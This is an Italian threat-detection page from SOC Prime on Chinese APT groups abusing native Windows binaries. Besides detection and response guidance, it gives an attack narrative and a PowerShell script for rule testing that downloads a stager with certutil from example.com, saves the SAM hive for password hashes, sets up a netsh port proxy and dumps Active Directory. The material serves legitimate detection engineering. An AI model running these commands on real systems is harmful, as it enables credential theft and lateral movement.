SOC Prime Bias: Critico

18 May 2026 18:20 UTC
newspaper icon hackers-arise.com

Ricerca degli APT cinesi che sfruttano strumenti Windows nativi

Author Photo
SOC Prime Team linkedin icon Segui
Ricerca degli APT cinesi che sfruttano strumenti Windows nativi
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Sommario

L’articolo esplora come i gruppi di minacce persistenti avanzate cinesi sfruttano le utilità integrate di Windows, spesso chiamate LOLBAS, per eseguire ricognizioni, rubare credenziali e muoversi lateralmente attraverso gli ambienti mimetizzandosi nelle attività amministrative di routine.

Indagine

Evidenzia l’uso specifico della riga di comando di strumenti nativi come nltest, certutil, netsh, reg.exe, vssadmin, e altri, e punta alle regole Sigma che possono aiutare a rilevare queste tecniche all’interno delle piattaforme SIEM.

Mitigazione

Si incoraggia i difensori a monitorare l’esecuzione sospetta dei binari nativi di Windows, a imporre controlli di accesso con il minor privilegio, a controllare le modifiche al registro e a implementare logiche di rilevamento basate sui modelli Sigma di riferimento.

Risposta

Quando viene identificata un’attività sospetta LOLBAS, i team di sicurezza dovrebbero avviare un allarme, isolare il host interessato, raccogliere i log pertinenti, confermare se si è verificato un dump delle credenziali o un movimento laterale, ed eseguire un’analisi forense su eventuali artefatti risultanti.

Flusso di Attacco

Stiamo ancora aggiornando questa parte. Iscriviti per essere notificato

Notificami

Esecuzione di Simulazione

Prerequisito: Il Controllo Pre-volo di Telemetria & Baseline deve essere superato.

Motivazione: Questa sezione descrive l’esecuzione precisa della tecnica dell’avversario (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrazione DEVONO riflettere direttamente i TTP identificati e mirare a generare la telemetria esatta prevista dalla logica di rilevamento.

  • Narrazione degli Attacchi & Comandi:

    Un attaccante che ha ottenuto un primo accesso su una workstation Windows associata a dominio cerca di mappare il dominio, enumerare i gruppi privilegiati, e raccogliere materiale di credenziali usando solo binari nativi per evitare di attivare le firme tradizionali degli AV. I passaggi sono:

    1. Enumerare i Controller di Dominio: nltest /dclist:domain.local – rivela tutti i DC nel dominio target.
    2. Raccogliere Informazioni di Sistema: systeminfo – raccoglie la versione OS, le patch, e i dettagli hardware.
    3. Elencare i Processi in Esecuzione: tasklist – fornisce informazioni sui servizi privilegiati.
    4. Interrogare i Registri degli Eventi di Windows per Eventi di Accesso: Get-EventLog -LogName Security -InstanceId 4624 (PowerShell) – estrae gli eventi di accesso riusciti.
    5. Scaricare un payload in fase: certutil -urlcache -split -f https://example.com/stager.exe C:WindowsTempstager.exe – usa certutil per bypassare il filtro web.
    6. Enumerare Amministratori Locali: net localgroup administrators – identifica account privilegiati.
    7. Esportare il Hive del Registro SAM: reg.exe save hklmsam C:sam.save – tenta di estrarre gli hash delle password.
    8. Creare un Proxy di Porta per Movimento Laterale: netsh interface portproxy add v4tov4 listenport=4444 connectaddress=10.0.0.5 connectport=3389 – prepara un tunnel.
    9. Enumerare i Record DNS: dnscmd . /enumrecords /zone – scopre le zone DNS interne.
    10. Esportare oggetti AD tramite LDIFDE: ldifde.exe -f C:WindowsTempad_dump.txt -p subtree – estrae i dati della directory.
    11. Creare una Copia Shadow del Volume: vssadmin create shadow /for=C: – abilita l’accesso a livello di file ai file bloccati.

    Ogni comando corrisponde esattamente a una delle stringhe “CommandLine|contains” nella regola Sigma, garantendo che la regola si attivi sugli eventi di creazione del processo risultanti.

  • Script di Test di Regressione: (PowerShell – auto-contenuto, richiede diritti di amministratore)

    # TC-20260518-A7B9K - Simula l'uso avversario delle utilità native di Windows
# NOTA: Esegui su un host Windows associato a dominio con privilegi di amministratore.

# 1. Enumerazione del controller di dominio
nltest /dclist:domain.local

# 2. Informazioni di sistema
systeminfo

# 3. Elenco processi
tasklist

# 4. Estrazione registro eventi di sicurezza (PowerShell)
Get-EventLog -LogName security -InstanceId 4624

# 5. Scarica payload in fase tramite certutil
certutil -urlcache -split -f https://example.com/stager.exe C:WindowsTempstager.exe

# 6. Enumerare gli amministratori locali
net localgroup administrators

# 7. Esportare l'hive SAM
reg.exe save hklmsam C:sam.save

# 8. Configura proxy di porta
netsh interface portproxy add v4tov4 listenport=4444 connectaddress=10.0.0.5 connectport=3389

# 9. Enumerazione delle zone DNS
dnscmd . /enumrecords /zone

# 10. Esportare dati AD tramite LDIFDE
ldifde.exe -f C:WindowsTempad_dump.txt -p subtree

# 11. Creare una copia shadow del volume
vssadmin create shadow /for=C:

  • Comandi di Pulizia:

    # Rimuovere file creati durante la simulazione
Remove-Item -Path C:WindowsTempstager.exe -ErrorAction SilentlyContinue
Remove-Item -Path C:sam.save -ErrorAction SilentlyContinue
Remove-Item -Path C:WindowsTempad_dump.txt -ErrorAction SilentlyContinue

# Elimina la regola del portproxy
netsh interface portproxy delete v4tov4 listenport=4444

# Elimina la copia shadow (opzionale - richiede ID copia shadow)
# vssadmin delete shadows /for=C: /all /quiet

Unisciti alla piattaforma Detection as Code di SOC Prime per migliorare la visibilità sulle minacce più rilevanti per il tuo business. Per aiutarti a iniziare e aumentare immediatamente il valore, prenota ora un incontro con gli esperti di SOC Prime.

Iscriviti gratis